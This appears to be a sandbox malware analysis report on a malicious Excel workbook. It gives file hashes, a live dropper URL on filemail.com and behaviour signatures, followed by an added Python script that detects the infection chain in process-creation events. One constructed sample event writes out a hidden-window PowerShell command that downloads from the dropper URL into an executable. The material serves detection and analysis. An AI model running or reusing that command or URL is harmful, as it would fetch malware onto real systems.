General

  • Target

    ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

  • Size

    1.1MB

  • Sample

    241113-dkbsmswarr

  • MD5

    01c16c040fe7d4ea91adf63333f925f8

  • SHA1

    265e06375fb597735faca5f7345cf7e67619f728

  • SHA256

    ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed

  • SHA512

    e68f8fae49c6f8808f2821c0c0a3f2948227bf2ef3bcea6b5c91eec4543bb587063441d96c1fe31f1b1516a5a738d882b3e6904f81e06b26c2399e7b02dcc84e

  • SSDEEP

    24576:gq9PLiijE2Z5Z2am8F9sPxQtF84LJQodsshoe2gVm:gEPLiij7Z5ZK8F9vFjLJQodK

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    • ps1.dropper

      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

    • exe.dropper

      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Targets

    • Target

      ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

    • Size

      1.1MB

    • MD5

      01c16c040fe7d4ea91adf63333f925f8

    • SHA1

      265e06375fb597735faca5f7345cf7e67619f728

    • SHA256

      ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed

    • SHA512

      e68f8fae49c6f8808f2821c0c0a3f2948227bf2ef3bcea6b5c91eec4543bb587063441d96c1fe31f1b1516a5a738d882b3e6904f81e06b26c2399e7b02dcc84e

    • SSDEEP

      24576:gq9PLiijE2Z5Z2am8F9sPxQtF84LJQodsshoe2gVm:gEPLiij7Z5ZK8F9vFjLJQodK

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Evasion via Device Credential Deployment

    • Drops file in System32 directory
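
The signatures above describe a chain of an Office process spawning a script host, PowerShell started with a hidden window, and a network request to the extracted dropper URL. The following is an added example, not part of the sandbox report or of any vendor's rule set: it runs that detection logic over constructed Sysmon-style process-creation events. The event records, the ProcEvent type, the parent and child process lists and the hidden-window regex are all assumptions made for illustration; the only values taken from the report are the dropper URL and the signature names.

```python
"""Triage the behaviour chain from this report over process-creation events.

Added example: the ProcEvent records below are constructed to illustrate
the detection logic and are not telemetry from the sandbox run.
"""
import re
from dataclasses import dataclass

# Dropper URL extracted by the sandbox (copied from the report's Malware Config).
DROPPER_URL = (
    "https://1017.filemail.com/api/file/get?filekey="
    "2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w"
    "&pk_vid=fd4f614bb209c62c1730945176a0904f"
)

# Assumption: these parent/child sets are a minimal illustrative allowlist of
# Office hosts and script interpreters, not an exhaustive list.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of -WindowStyle (-w, -win, ...),
# so match "-w<anything> hidden" rather than the full switch name only.
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w\S*\s+hidden\b")
URL_RE = re.compile(r"""https?://[^\s'"]+""")


@dataclass
class ProcEvent:
    """Subset of a Sysmon Event ID 1 record (constructed shape, not a real schema)."""
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse(event: ProcEvent) -> list:
    """Return the report's signature names that this single event triggers."""
    findings = []
    child, parent = basename(event.image), basename(event.parent_image)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append("Process spawned unexpected child process")
    if child in POWERSHELL:
        findings.append("Command and Scripting Interpreter: PowerShell")
        if HIDDEN_RE.search(event.command_line):
            findings.append("PowerShell launched with hidden display window")
    for url in URL_RE.findall(event.command_line):
        if url == DROPPER_URL:
            findings.append("Command line references extracted dropper URL")
        else:
            findings.append("Command line contains URL: " + url)
    return findings


def triage(events) -> dict:
    """Map event index -> findings, keeping only events that triggered something."""
    result = {}
    for i, e in enumerate(events):
        hits = analyse(e)
        if hits:
            result[i] = hits
    return result


# Constructed sample events: one matching the report's chain, two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        command_line='powershell.exe -w hidden -c "Invoke-WebRequest \''
                     + DROPPER_URL + '\' -OutFile $env:TEMP\\a.exe"',
    ),
    ProcEvent(  # Explorer opening a workbook: no script host involved
        image=r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        parent_image=r"C:\Windows\explorer.exe",
        command_line='"EXCEL.EXE" C:\\Users\\u\\report.xls',
    ),
    ProcEvent(  # interactive PowerShell from a console: interpreter only, no hidden window or URL
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\cmd.exe",
        command_line="powershell.exe -NoProfile Get-Process",
    ),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The PowerShell-only finding on the console event shows why the interpreter signature is informational on its own; the combination with an Office parent, a hidden window and a known dropper URL is what separates this chain from routine administration.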

MITRE ATT&CK Enterprise v15
